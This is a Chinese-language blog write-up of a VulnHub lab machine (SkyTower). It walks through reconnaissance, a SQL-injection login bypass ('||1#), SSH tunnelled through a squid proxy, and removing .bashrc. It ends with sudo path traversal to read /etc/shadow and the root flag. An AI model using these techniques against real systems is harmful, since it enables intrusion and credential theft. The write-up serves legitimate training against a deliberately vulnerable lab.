KeyTower靶机

已于 2024-07-30 21:21:57 修改
阅读量266 收藏 12
点赞数 20
文章标签: 网络安全 github 开源 远程工作 linux
于 2024-07-30 20:51:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61995767/article/details/140806394
版权

靶机地址:SkyTower: 1 ~ VulnHub

一、信息收集

步骤一:将攻击机kali和靶机均设为桥接模式,此时靶机的MAC地址为:

步骤二:确定目标主机

arp-scan -l

得到目标主机IP为192.168.7.61

步骤三:查看开放的端口


nmap -sV -p- 192.168.7.61

步骤四:浏览器访问

步骤五:目录扫描,无有用信息

dirb http://192.168.7.61/

步骤六:返回登录页面,登录时使用burp抓包,并在email处拼接 ',发现返回包出现sql报错

拼接or 1=1 #,发现or、=均被过滤

尝试使用||代替or,拼接'||1#,显示登录成功,并出现一组账号密码:john hereisjohn

二、权限获取

步骤七:得到账号密码,就可以尝试使用ssh连接,但连接失败,因为靶机22端口处于filtered状态,此时只剩下3128端口,这个是一个(http-proxy)代理服务,那么有没有可能是22端口需要经3128端口服务代理之后才能访问;使用代理工具 proxychains进行配置代理,将http流量代理到目标主机的3128端口

vi /etc/proxychains4.conf

步骤八:使用proxychains以及账号密码登录,却发现登录后会立即退出

proxychains ssh john@192.168.7.61

步骤九:尝试在登录的同时执行命令

proxychains ssh john@192.168.7.61 /bin/bash

依次查看到.bashrc文件,发现该文件有一个退出的动作

可以将此文件删除以解决自动退出动作

步骤十:cd到网站目录,查看其配置文件

cd /var/www

查看login.php文件

cat login.php

使用rm命令删除.bashrc文件,删除成功

proxychains ssh john@192.168.7.61 rm .bashrc
proxychains ssh john@192.168.7.61 ls -la

重新尝试使用ssh连接,此时就不存在自动退出的操作

proxychains ssh john@192.168.7.61

连接mysql,连接成功

mysql -uroot -proot

获取MySQL数据库数据,得到三组账号密码

show databases;
use SkyTech;
show tables;
select * from login;

在john用户处输入sudo -l查看可提权的命令,发现没有

sudo切换sara用户却发现无法切换,此时只能退出使用ssh连接,却发现它如同john登录一样,得删除掉.bashrc文件

三、权限提升

proxychains ssh sara@192.168.7.61 ls -la
proxychains ssh sara@192.168.7.61 rm .bashrc
proxychains ssh sara@192.168.7.61

输入id,发现sara用户也是普通用户,再输入sudo -l查看显示允许当前用户使用的命令

发现可以在/accounts/*使用root的cat和ls命令

查看/etc/passwd,可以看到root用户加密的密码,尝试解密,解密失败

sudo cat /accounts/../etc/shadow

sudo /bin/ls /accounts/../../../                #列举根目录下有哪些内容
sudo /bin/ls /accounts/../../../root/           #列举root权限下的flag文件地址
sudo /bin/cat /accounts/../../../root/flag.txt   #读取root权限下的flag文件内容

切换root用户

提权成功!

嗷嗷~嗷嗷~
关注
  • 20
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
metasploitable3靶机
雨泽网络工作室
08-23 1915
Metasploitable3靶机攻击 注:这些密码都是参考网站https://github.com/rapid7/metasploitable3/wiki/Configuration#credentials 21端口ftp 使用nmap扫描发现21端口打开 通过msfconsole 调出metasploit 使用ftp_login模块 使用set设置参数 使用run进行攻击 登录 22端口ssh 通过nmap扫描发现22端口开启 爆破s..
metasploitable2靶机
雨泽网络工作室
08-16 4834
一、Metasploitable2简介 Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机。 开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了DVWA、Mutillidae等Web漏洞演练平台。 使用方法
搭建Metasploitable靶机
yzl_007的博客
08-07 1233
搭建Metasploitable靶机 开始本机下载后来解压直接报毒,上虚拟机操作(windows10) https://github.com/rapid7/metasploitable3 下载好压缩包后通过共享文件传到虚拟机上 下载packer(推荐1.35,报错更换版本) https://releases.hashicorp.com/packer/ 安装好你想要的版本后将exe文件放在想要的地方,然后添加上环境变量 例如虚拟机中是如下位置 在环境变量path里添加上即可 然后cmd packer
安装metasploitable靶机
qq_51478862的博客
04-26 2329
1下载地址:https://sourceforge.net/projects/metasploitable/ 下载好加压后,最好保存在虚拟机的目录下,好方便管理。 2·打开虚拟机,点文件中的扫描 扫描的位置要选择你保存有靶机的目录 3.然后扫描到虚拟机后点完成 4.点关闭后就安装好了 5.配置不用更改,够使用的。然后运行虚拟机 打开后选择我已复制。。 6.然后会显示让我们登录的页面 7. 这句话的意思就是用户名与密码是msfadmin 8.注意:他这个密码是没有任何回显的。登录成功后是是这个
docker搭建靶机
Z_Grant的博客
09-21 3431
文章目录一,docker(1)基础概念(2)安装docker(3)docker命令 一,docker (1)基础概念 沙箱机制 1.沙箱是一个虚拟系统程序,沙箱提供的环境相对于每一个运行的程序都是独立的,而且不会对现有的系统产生影响. 2.沙箱具有非常良好的独立性、隔离性,所以能够搭建一些具有高风险的软件进行测试. docker 一个开源的应用容器引擎,基于GO语言 作用:开发者打包他...
LOLY: 1靶机
logan_logan的博客
07-19 607
1.端口扫描 2.在网页输入IP地址的时候发现一直跳转成loly.lc,所以在/etc/hosts添加一条解析; 3.目录枚举 通过目录枚举发现CMS是wordpress,直接上wpscan; gobuster dir -u http://10.36.101.181/wordpress -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 4.WPSCAN枚举 经过枚举,成功得到用户名和密码; wpscan --url htt
vulnhub靶机:FunBox
Keepb1ue的博客
09-28 3042
靶机配置说明: 靶机下载地址:https://www.vulnhub.com/entry/funbox-1,518/ 靶机:DC1 (VirtualBox) IP:192.168.56.109 攻击机:Kali(VMware) IP:192.168.56.108 在下载地址中有也有详细的靶机说明,而FunBox需要寻找的flag总数为1个。 靶机环境配置: 将靶机和kali都桥接到同一张网卡即可,这里我都桥接到virtualBox的Host-only网卡,保证无干扰目标。 靶机渗透开始: 先看下手里的
渗透靶机之BULLDOG
qq_43235703的博客
02-02 1132
靶机渗透之BULLDOG 渗透环境: 攻击机:kali(10.0.10.198) 靶机:vmbox(10.0.10.208) 连接模式:全部为桥接 探嗅目标 安装好我们的靶机之后开机,然后你的ip地址就出现在靶机界面上面,也省了我们用kali来扫 但是多少这达不到我们模拟实战的过程,真正的渗透谁会把地址摆着给你啊对不对,所以还是要动手用netdiscover来扫一波,直接扫出来然后上nmap扫端...
php靶机网站,JIS-CTF靶机 Kioptrix靶机渗透
weixin_30679293的博客
03-25 507
前言JIS靶机以拿到5个flag为止,本文攻击的靶机为kioptrix level1 以拿到root权限为止。靶机下载/搭建:靶机1:https://pan.baidu.com/s/1kt9dMb423DZhIKXObfbwTw靶机2:http://www.kioptrix.com/dlvm/Kioptrix_Level_1.rar开始:JIS靶机全解:探测网络, IP:192.168.1.135...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
PWN靶机环境 网络安全
05-23
PWN靶机环境
Vulnix.7z靶机
04-25
一个vulnhub上的靶机,因为网络原因,下载的特别慢,我下载好,上传上来,供大家学习。如果大家有更好的靶机,请私我。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8352
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
GitHub 详解教程
m0_46566693的博客
07-24 2658
GitHub 详解教程
WHAT - 一个 Github 仓库的 License 如何解读
weixin_58540586的博客
07-24 1126
作为开发者:选择合适的许可证,根据你的需求和目标,确保在README文件和LICENSE文件中清晰地列出许可证信息。作为使用者:阅读和理解许可证条款,确保你在使用和分发代码时遵循相应的要求。通过以上步骤,你可以确保在开发和使用开源代码时合法合规,同时尊重和支持开源社区的工作。
GitHub Actions是什么
最新发布
ZJQ的博客
07-24 145
GitHub Actions提供了多种运行环境(如Ubuntu、Windows和macOS)和Docker集成,以满足各种应用的需求。开发者还可以在GitHub Marketplace上共享自己的Actions,并使用其他开发者分享的Actions。务,它允许开发者直接在GitHub仓库中设置、定制和执行工作流程。工作流包含一个作业,该作业在Ubuntu最新版本的虚拟机上运行。综上所述,GitHub Actions配置文件中设置的工作流在。GitHub Actions的工作基于“工作流”,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值